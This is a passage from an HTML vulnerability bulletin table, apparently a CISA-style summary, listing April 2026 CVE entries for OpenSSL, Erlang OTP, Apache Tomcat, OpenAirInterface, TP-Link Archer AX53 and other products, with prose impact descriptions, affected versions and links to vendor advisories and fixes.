    <td><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10" target="_blank" rel="noopener">https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: Applications using AES-CFB128 encryption or decryption on systems with AVX-512 and VAES support can trigger an out-of-bounds read of up to 15 bytes when processing partial cipher blocks. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application if the input buffer ends at a memory page boundary and the following page is unmapped. There is no information disclosure as the over-read bytes are not written to output. The vulnerable code path is only reached when processing partial blocks (when a previous call left an incomplete block and the current call provides fewer bytes than needed to complete it). Additionally, the input buffer must be positioned at a page boundary with the following page unmapped. CFB mode is not used in TLS/DTLS protocols, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead. For these reasons the issue was assessed as Low severity according to our Security Policy. Only x86-64 systems with AVX-512 and VAES instruction support are affected. Other architectures and systems without VAES support use different code paths that are not affected. OpenSSL FIPS module in 3.6 version is affected by this issue.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28386" target="_blank" rel="noopener">CVE-2026-28386</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/61f428a2fc6671ede184a19f71e6e495f0689621" target="_blank" rel="noopener">3.6.2 git commit</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0)/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28387" target="_blank" rel="noopener">CVE-2026-28387</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe" target="_blank" rel="noopener">3.6.2 git commit</a><br><a href="https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3" target="_blank" rel="noopener">3.5.6 git commit</a><br><a href="https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b" target="_blank" rel="noopener">3.4.5 git commit</a><br><a href="https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7" target="_blank" rel="noopener">3.3.7 git commit</a><br><a href="https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177" target="_blank" rel="noopener">3.0.20 git commit</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28388" target="_blank" rel="noopener">CVE-2026-28388</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3" target="_blank" rel="noopener">3.6.2 git commit</a><br><a href="https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726" target="_blank" rel="noopener">3.5.6 git commit</a><br><a href="https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8" target="_blank" rel="noopener">3.4.5 git commit</a><br><a href="https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139" target="_blank" rel="noopener">3.3.7 git commit</a><br><a href="https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e" target="_blank" rel="noopener">3.0.20 git commit</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28389" target="_blank" rel="noopener">CVE-2026-28389</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686" target="_blank" rel="noopener">3.6.2 git commit</a><br><a href="https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5" target="_blank" rel="noopener">3.5.6 git commit</a><br><a href="https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616" target="_blank" rel="noopener">3.4.5 git commit</a><br><a href="https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a" target="_blank" rel="noopener">3.3.7 git commit</a><br><a href="https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f" target="_blank" rel="noopener">3.0.20 git commit</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">OpenSSL--OpenSSL</td>
    <td>Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28390" target="_blank" rel="noopener">CVE-2026-28390</a></td>
    <td><a href="https://openssl-library.org/news/secadv/20260407.txt" target="_blank" rel="noopener">OpenSSL Advisory</a><br><a href="https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc" target="_blank" rel="noopener">3.6.2 git commit</a><br><a href="https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6" target="_blank" rel="noopener">3.5.6 git commit</a><br><a href="https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788" target="_blank" rel="noopener">3.4.5 git commit</a><br><a href="https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75" target="_blank" rel="noopener">3.3.7 git commit</a><br><a href="https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4" target="_blank" rel="noopener">3.0.20 git commit</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--Emocheck</td>
    <td>Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a crafted DLL file is placed in the same directory, arbitrary code may be executed with the privilege of the user invoking EmoCheck.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28704" target="_blank" rel="noopener">CVE-2026-28704</a></td>
    <td><a href="https://www.jpcert.or.jp/press/2026/PR20260410.html" target="_blank" rel="noopener">https://www.jpcert.or.jp/press/2026/PR20260410.html</a><br><a href="https://github.com/JPCERTCC/EmoCheck/" target="_blank" rel="noopener">https://github.com/JPCERTCC/EmoCheck/</a><br><a href="https://jvn.jp/en/jp/JVN00263243/" target="_blank" rel="noopener">https://jvn.jp/en/jp/JVN00263243/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Erlang--OTP</td>
    <td>Incorrect Authorization vulnerability in Erlang OTP (inets modules) allows unauthenticated access to CGI scripts protected by directory rules when served via script_alias. When script_alias maps a URL prefix to a directory outside DocumentRoot, mod_auth evaluates directory-based access controls against the DocumentRoot-relative path while mod_cgi executes the script at the ScriptAlias-resolved path. This path mismatch allows unauthenticated access to CGI scripts that directory rules were meant to protect. This vulnerability is associated with program files lib/inets/src/http_server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_server/mod_cgi.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to inets from 5.10 until 9.6.2, 9.3.2.4 and 9.1.0.6.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28808" target="_blank" rel="noopener">CVE-2026-28808</a></td>
    <td><a href="https://github.com/erlang/otp/security/advisories/GHSA-3vhp-h532-mc3f" target="_blank" rel="noopener">https://github.com/erlang/otp/security/advisories/GHSA-3vhp-h532-mc3f</a><br><a href="https://cna.erlef.org/cves/CVE-2026-28808.html" target="_blank" rel="noopener">https://cna.erlef.org/cves/CVE-2026-28808.html</a><br><a href="https://osv.dev/vulnerability/EEF-CVE-2026-28808" target="_blank" rel="noopener">https://osv.dev/vulnerability/EEF-CVE-2026-28808</a><br><a href="https://www.erlang.org/doc/system/versions.html#order-of-versions" target="_blank" rel="noopener">https://www.erlang.org/doc/system/versions.html#order-of-versions</a><br><a href="https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e82942688" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e82942688</a><br><a href="https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871ff7c" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871ff7c</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Erlang--OTP</td>
    <td>Generation of Predictable Numbers or Identifiers vulnerability in Erlang/OTP kernel (inet_res, inet_db modules) allows DNS Cache Poisoning. The built-in DNS resolver (inet_res) uses a sequential, process-global 16-bit transaction ID for UDP queries and does not implement source port randomization. Response validation relies almost entirely on this ID, making DNS cache poisoning practical for an attacker who can observe one query or predict the next ID. This conflicts with RFC 5452 recommendations for mitigating forged DNS answers. inet_res is intended for use in trusted network environments and with trusted recursive resolvers. Earlier documentation did not clearly state this deployment assumption, which could lead users to deploy the resolver in environments where spoofed DNS responses are possible. This vulnerability is associated with program files lib/kernel/src/inet_db.erl and lib/kernel/src/inet_res.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to kernel from 3.0 until 10.6.2, 10.2.7.4 and 9.2.4.11.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-28810" target="_blank" rel="noopener">CVE-2026-28810</a></td>
    <td><a href="https://github.com/erlang/otp/security/advisories/GHSA-v884-5jg5-whj8" target="_blank" rel="noopener">https://github.com/erlang/otp/security/advisories/GHSA-v884-5jg5-whj8</a><br><a href="https://cna.erlef.org/cves/CVE-2026-28810.html" target="_blank" rel="noopener">https://cna.erlef.org/cves/CVE-2026-28810.html</a><br><a href="https://osv.dev/vulnerability/EEF-CVE-2026-28810" target="_blank" rel="noopener">https://osv.dev/vulnerability/EEF-CVE-2026-28810</a><br><a href="https://www.erlang.org/doc/system/versions.html#order-of-versions" target="_blank" rel="noopener">https://www.erlang.org/doc/system/versions.html#order-of-versions</a><br><a href="https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839a5" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839a5</a><br><a href="https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad9fd" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad9fd</a><br><a href="https://github.com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231b8" target="_blank" rel="noopener">https://github.com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231b8</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>Configured cipher preference order not preserved vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.16 through 11.0.18, from 10.1.51 through 10.1.52, from 9.0.114 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29129" target="_blank" rel="noopener">CVE-2026-29129</a></td>
    <td><a href="https://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f" target="_blank" rel="noopener">https://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled vulnerability in Apache Tomcat, Apache Tomcat Native. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M7 through 10.1.52, from 9.0.83 through 9.0.115; Apache Tomcat Native: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39, from 1.3.0 through 1.3.6, from 2.0.0 through 2.0.13. Users are recommended to upgrade to version Tomcat Native 1.3.7 or 2.0.14 and Tomcat 11.0.20, 10.1.53 and 9.0.116, which fix the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29145" target="_blank" rel="noopener">CVE-2026-29145</a></td>
    <td><a href="https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7kltws57jfz" target="_blank" rel="noopener">https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7kltws57jfz</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Apache Software Foundation--Apache Tomcat</td>
    <td>Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11.0.19, 10.1.53 and 9.0.116, which fixes the issue.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29146" target="_blank" rel="noopener">CVE-2026-29146</a></td>
    <td><a href="https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w" target="_blank" rel="noopener">https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a--n/a</td>
    <td>PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at login.php.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29861" target="_blank" rel="noopener">CVE-2026-29861</a></td>
    <td><a href="https://github.com/amanyadav78/CVE-2026-29861" target="_blank" rel="noopener">https://github.com/amanyadav78/CVE-2026-29861</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Entechtaiwan[.]com – PowerStrip</td>
    <td>The pstrip64.sys driver in EnTech Taiwan PowerStrip &lt;=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-29923" target="_blank" rel="noopener">CVE-2026-29923</a></td>
    <td><a href="https://entechtaiwan.com/util/ps.shtm" target="_blank" rel="noopener">https://entechtaiwan.com/util/ps.shtm</a><br><a href="https://packetstorm.news/files/id/218394/" target="_blank" rel="noopener">https://packetstorm.news/files/id/218394/</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a-- OpenAirInterface</td>
    <td>OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in processing UplinkNASTransport containing Authentication Response containing a NAS PDU with an oversize response (for example, 100 bytes). The response is decoded by AMF and passed to the AUSF component for verification. AUSF crashes on receiving this oversize response. This can prohibit users from further registration and verification and can cause Denial of Service (DoS).</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30075" target="_blank" rel="noopener">CVE-2026-30075</a></td>
    <td><a href="https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D" target="_blank" rel="noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D</a><br><a href="https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6" target="_blank" rel="noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a-- OpenAirInterface</td>
    <td>OpenAirInterface V2.2.0 AMF crashes when it receives an NGAP message with an invalid procedure code or invalid PDU-type. For example, when the message specification requires InitiatingMessage but the message is sent as successfulOutcome.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30078" target="_blank" rel="noopener">CVE-2026-30078</a></td>
    <td><a href="https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/74" target="_blank" rel="noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/74</a><br><a href="https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414" target="_blank" rel="noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a-- OpenAirInterface</td>
    <td>In OpenAirInterface V2.2.0 AMF, out-of-sequence messages cause an incorrect state transition during the UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after InitialUERegistration, a registration reject is received followed by a registration accept. This leads the UE to be registered without proper authentication.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30079" target="_blank" rel="noopener">CVE-2026-30079</a></td>
    <td><a href="https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77" target="_blank" rel="noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">n/a-- OpenAirInterface</td>
    <td>OpenAirInterface v2.2.0 accepts Security Mode Complete without any integrity protection. The configuration supports the integrity algorithms NIA1 and NIA2, but if a UE sends an initial registration request advertising only the security capability IA0, OpenAirInterface accepts it and proceeds. This downgraded security context can make replay attacks possible.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30080" target="_blank" rel="noopener">CVE-2026-30080</a></td>
    <td><a href="https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78" target="_blank" rel="noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78</a><br>&nbsp;</td>
    </tr>

    <td class="vendor-product">chartbrew--chartbrew</td>
    <td>Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5.</td>
    <td>2026-04-10</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30232" target="_blank" rel="noopener">CVE-2026-30232</a></td>

    <a href="https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv" target="_blank" rel="noopener">https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv</a><br><a href="https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1" target="_blank" rel="noopener">https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1</a></td>
    </tr>

    <td class="vendor-product">n/a-- Daylight Studio FuelCMS</td>
    <td>Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability in the Blocks module.</td>
    <td>2026-04-07</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30460" target="_blank" rel="noopener">CVE-2026-30460</a></td>

    <a href="https://github.com/daylightstudio/FUEL-CMS/" target="_blank" rel="noopener">https://github.com/daylightstudio/FUEL-CMS/</a><br><a href="http://daylight.com" target="_blank" rel="noopener">http://daylight.com</a><br><a href="http://fuelcms.com" target="_blank" rel="noopener">http://fuelcms.com</a><br><a href="https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf" target="_blank" rel="noopener">https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf</a></td>
    </tr>

    <td class="vendor-product">Ms4w[.]com -- GatewayGeo Mapserver</td>
    <td>A Dynamic-link Library Injection vulnerability in GatewayGeo MapServer for Windows version 5 allows attackers to escalate privileges via a crafted executable.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30478" target="_blank" rel="noopener">CVE-2026-30478</a></td>

    <a href="https://ms4w.com" target="_blank" rel="noopener">https://ms4w.com</a><br><a href="https://github.com/penjaminTester/Research/tree/main/CVE-2026-30478" target="_blank" rel="noopener">https://github.com/penjaminTester/Research/tree/main/CVE-2026-30478</a></td>
    </tr>

    <td class="vendor-product">Ms4w[.]com -- GatewayGeo Mapserver</td>
    <td>A Dynamic-link Library Injection vulnerability in OSGeo Project MapServer before v8.0 allows attackers to execute arbitrary code via a crafted executable.</td>
    <td>2026-04-09</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30479" target="_blank" rel="noopener">CVE-2026-30479</a></td>

    <a href="https://mapserver.org/index.html" target="_blank" rel="noopener">https://mapserver.org/index.html</a><br><a href="https://github.com/penjaminTester/Research/tree/main/CVE-2026-30479" target="_blank" rel="noopener">https://github.com/penjaminTester/Research/tree/main/CVE-2026-30479</a></td>
    </tr>

    <td class="vendor-product">Aziot[.]life -- AZIOT 1 Node Smart Switch</td>
    <td>An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp) WiFi/Bluetooth Enabled, Software Version 1.1.9, due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication.</td>
    <td>2026-04-06</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30613" target="_blank" rel="noopener">CVE-2026-30613</a></td>

    <a href="http://aziot.com" target="_blank" rel="noopener">http://aziot.com</a><br><a href="https://github.com/dumbermore/tuya/blob/main/README.md" target="_blank" rel="noopener">https://github.com/dumbermore/tuya/blob/main/README.md</a></td>
    </tr>

    <td class="vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
    <td>A stack-based buffer overflow in the tmpServer module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to trigger a segmentation fault and potentially execute arbitrary code via a specially crafted configuration file. Successful exploitation may cause a crash and could allow arbitrary code execution, enabling modification of device state, exposure of sensitive data, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30814" target="_blank" rel="noopener">CVE-2026-30814</a></td>

    <a href="https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://talosintelligence.com/vulnerability_reports/" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/</a><br><a href="https://www.tp-link.com/us/support/faq/5055/" target="_blank" rel="noopener">https://www.tp-link.com/us/support/faq/5055/</a></td>
    </tr>

    <td class="vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
    <td>An OS command injection vulnerability in the OpenVPN module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30815" target="_blank" rel="noopener">CVE-2026-30815</a></td>

    <a href="https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://talosintelligence.com/vulnerability_reports/" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/</a><br><a href="https://www.tp-link.com/us/support/faq/5055/" target="_blank" rel="noopener">https://www.tp-link.com/us/support/faq/5055/</a></td>
    </tr>

    <td class="vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
    <td>An external control of configuration vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.</td>
    <td>2026-04-08</td>
    <td>not yet calculated</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-30816" target="_blank" rel="noopener">CVE-2026-30816</a></td>

    <a href="https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware" target="_blank" rel="noopener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware</a><br><a href="https://talosintelligence.com/vulnerability_reports/" target="_blank" rel="noopener">https://talosintelligence.com/vulnerability_reports/</a><br><a href="https://www.tp-link.com/us/support/faq/5055/" target="_blank" rel="noopener">https://www.tp-link.com/us/support/faq/5055/</a></td>
    </tr>

    <td class="vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
    <td>An external configuration control vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.</td>
    <td>2026-04-08</td>
